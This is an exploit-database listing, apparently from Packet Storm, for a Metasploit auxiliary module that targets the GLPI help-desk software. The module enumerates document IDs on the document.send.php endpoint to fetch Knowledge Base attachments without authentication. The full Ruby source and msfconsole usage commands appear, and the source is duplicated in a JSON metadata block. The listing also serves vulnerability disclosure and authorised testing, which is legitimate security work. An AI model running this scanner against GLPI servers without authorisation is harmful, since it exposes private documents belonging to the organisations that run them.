📄 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953

Description

This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint. The module performs an automated enumeration of docid values within a defined range and...

Visit Original Source

Basic Information

ID PACKETSTORM:215953

Published Feb 20, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : GLPI Accessible Documents IDOR Scanner – Metasploit Auxiliary Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.glpi-project.org/en/ |
=============================================================================================================================================

[+] Summary : This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint.
The module performs an automated enumeration of docid values within a defined range and attempts to access documents without authentication.
If the server responds with HTTP 200 and a non-HTML content type (e.g., PDF, image, ZIP, etc.), the module flags it as a potential Insecure Direct Object Reference (IDOR) vulnerability.

[+] The scanner:

Iterates over a configurable docid range

Targets KnowbaseItem document associations

Validates responses based on allowed content types

Reports accessible documents that may indicate improper access control

This module is intended for authorized security testing to identify access control misconfigurations in GLPI deployments.

[+] POC :

modules/auxiliary/scanner/http/glpi_doc_idor.rb

msfconsole
msf > reload_all

use auxiliary/scanner/http/glpi_doc_idor
set RHOST 10.0.0.1
set RPORT 80
set TARGETURI /
set ITEMS_ID 123
set DOCID_START 1
set DOCID_END 100
run

##
# This module requires Metasploit Framework
# Tested with Metasploit 6.x
##

require 'msf/core'
require 'uri'
require 'net/http'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'GLPI Accessible Documents IDOR Scanner',
'Description' => %q{
Scans a GLPI installation for accessible KnowbaseItem documents without authentication.
This checks for possible IDOR vulnerabilities by iterating docid values.
},
'Author' => ['Indoushka'],
'License' => MSF_LICENSE
))

register_options(
[
Opt::RHOST(),
Opt::RPORT(80),
OptString.new('TARGETURI', [true, "Base path of GLPI", '/']),
OptInt.new('ITEMS_ID', [true, "Items ID to test", 1]),
OptInt.new('DOCID_START', [true, "Starting docid", 1]),
OptInt.new('DOCID_END', [true, "Ending docid", 100])
]
)

register_advanced_options(
[
OptBool.new('SSL', [true, "Use SSL", false])
]
)
end

def check_content_type(resp)
return false if resp.nil? || resp['Content-Type'].nil?
ct = resp['Content-Type'].downcase
allowed = ["image/", "application/pdf", "application/xml", "text/xml", "text/csv",
"application/zip", "application/x-rar-compressed", "application/x-gzip",
"audio/", "video/", "application/postscript", "image/svg+xml",
"application/x-shockwave-flash", "application/x-tar", "application/x-bzip2",
"application/x-7z-compressed", "application/vnd.ms-excel", "application/msword"]
allowed.any? { |sub| ct.include?(sub) } && !ct.include?("text/html")
end

def run
start_id = datastore['DOCID_START']
end_id = datastore['DOCID_END']
items_id = datastore['ITEMS_ID']
base_uri = normalize_uri(datastore['TARGETURI'])
use_ssl = datastore['SSL']

(start_id..end_id).each do |docid|
target_url = "#{base_uri}/front/document.send.php?docid=#{docid}&itemtype=KnowbaseItem&items_id=#{items_id}"

begin
res = send_request_cgi({
'uri' => target_url,
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; GLPI-Doc-Checker/1.1)'
}
})

next if res.nil?

if res.code == 200 && check_content_type(res)
print_good("#{rhost}:#{rport}#{target_url} -> #{res['Content-Type']} - vulnerability found")
elsif framework.debug?
print_status("Skipped #{target_url} -> #{res.code} -> #{res['Content-Type']}")
end

rescue ::Rex::ConnectionError => e
print_error("Connection error: #{e}")
end
end
end
end

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-20T23:02:06",
    "description": "This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint. The module performs an automated enumeration of docid values within a defined range and...",
    "published": "2026-02-20T00:00:00",
    "modified": "2026-02-20T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215953",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : GLPI Accessible Documents IDOR Scanner \u2013 Metasploit Auxiliary Module                                                        |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://www.glpi-project.org/en/                                                                                            |\n    =============================================================================================================================================\n    \n    [+] Summary    :  This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint.\n                      The module performs an automated enumeration of docid values within a defined range and attempts to access documents without authentication. \n    \t\t\t\t  If the server responds with HTTP 200 and a non-HTML content type (e.g., PDF, image, ZIP, etc.), the module flags it as a potential Insecure Direct Object Reference (IDOR) vulnerability.\n    \n    [+] The scanner:\n    \n    Iterates over a configurable docid range\n    \n    Targets KnowbaseItem document associations\n    \n    Validates responses based on allowed content types\n    \n    Reports accessible documents that may indicate improper access control\n    \n    This module is intended for authorized security testing to identify access control misconfigurations in GLPI deployments.\n    \n    [+] POC : \n    \n    modules/auxiliary/scanner/http/glpi_doc_idor.rb\n    \n    msfconsole\n    msf > reload_all\n    \n    use auxiliary/scanner/http/glpi_doc_idor\n    set RHOST 10.0.0.1\n    set RPORT 80\n    set TARGETURI /\n    set ITEMS_ID 123\n    set DOCID_START 1\n    set DOCID_END 100\n    run\n    \n    \n    \n    ##\n    # This module requires Metasploit Framework\n    # Tested with Metasploit 6.x\n    ##\n    \n    require 'msf/core'\n    require 'uri'\n    require 'net/http'\n    \n    class MetasploitModule < Msf::Auxiliary\n      include Msf::Exploit::Remote::HttpClient\n    \n      def initialize(info = {})\n        super(update_info(info,\n          'Name'           => 'GLPI Accessible Documents IDOR Scanner',\n          'Description'    => %q{\n            Scans a GLPI installation for accessible KnowbaseItem documents without authentication.\n            This checks for possible IDOR vulnerabilities by iterating docid values.\n          },\n          'Author'         => ['Indoushka'],\n          'License'        => MSF_LICENSE\n        ))\n    \n        register_options(\n          [\n            Opt::RHOST(),\n            Opt::RPORT(80),\n            OptString.new('TARGETURI', [true, \"Base path of GLPI\", '/']),\n            OptInt.new('ITEMS_ID', [true, \"Items ID to test\", 1]),\n            OptInt.new('DOCID_START', [true, \"Starting docid\", 1]),\n            OptInt.new('DOCID_END', [true, \"Ending docid\", 100])\n          ]\n        )\n    \n        register_advanced_options(\n          [\n            OptBool.new('SSL', [true, \"Use SSL\", false])\n          ]\n        )\n      end\n    \n      def check_content_type(resp)\n        return false if resp.nil? || resp['Content-Type'].nil?\n        ct = resp['Content-Type'].downcase\n        allowed = [\"image/\", \"application/pdf\", \"application/xml\", \"text/xml\", \"text/csv\",\n                   \"application/zip\", \"application/x-rar-compressed\", \"application/x-gzip\",\n                   \"audio/\", \"video/\", \"application/postscript\", \"image/svg+xml\",\n                   \"application/x-shockwave-flash\", \"application/x-tar\", \"application/x-bzip2\",\n                   \"application/x-7z-compressed\", \"application/vnd.ms-excel\", \"application/msword\"]\n        allowed.any? { |sub| ct.include?(sub) } && !ct.include?(\"text/html\")\n      end\n    \n      def run\n        start_id = datastore['DOCID_START']\n        end_id   = datastore['DOCID_END']\n        items_id = datastore['ITEMS_ID']\n        base_uri = normalize_uri(datastore['TARGETURI'])\n        use_ssl = datastore['SSL']\n    \n        (start_id..end_id).each do |docid|\n          target_url = \"#{base_uri}/front/document.send.php?docid=#{docid}&itemtype=KnowbaseItem&items_id=#{items_id}\"\n    \n          begin\n            res = send_request_cgi({\n              'uri'     => target_url,\n              'method'  => 'GET',\n              'headers' => {\n                'User-Agent' => 'Mozilla/5.0 (compatible; GLPI-Doc-Checker/1.1)'\n              }\n            })\n    \n            next if res.nil?\n    \n            if res.code == 200 && check_content_type(res)\n              print_good(\"#{rhost}:#{rport}#{target_url} -> #{res['Content-Type']} - vulnerability found\")\n            elsif framework.debug?\n              print_status(\"Skipped #{target_url} -> #{res.code} -> #{res['Content-Type']}\")\n            end\n    \n          rescue ::Rex::ConnectionError => e\n            print_error(\"Connection error: #{e}\")\n          end\n        end\n      end\n    end\n    \n    \t\n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215953",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215953/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply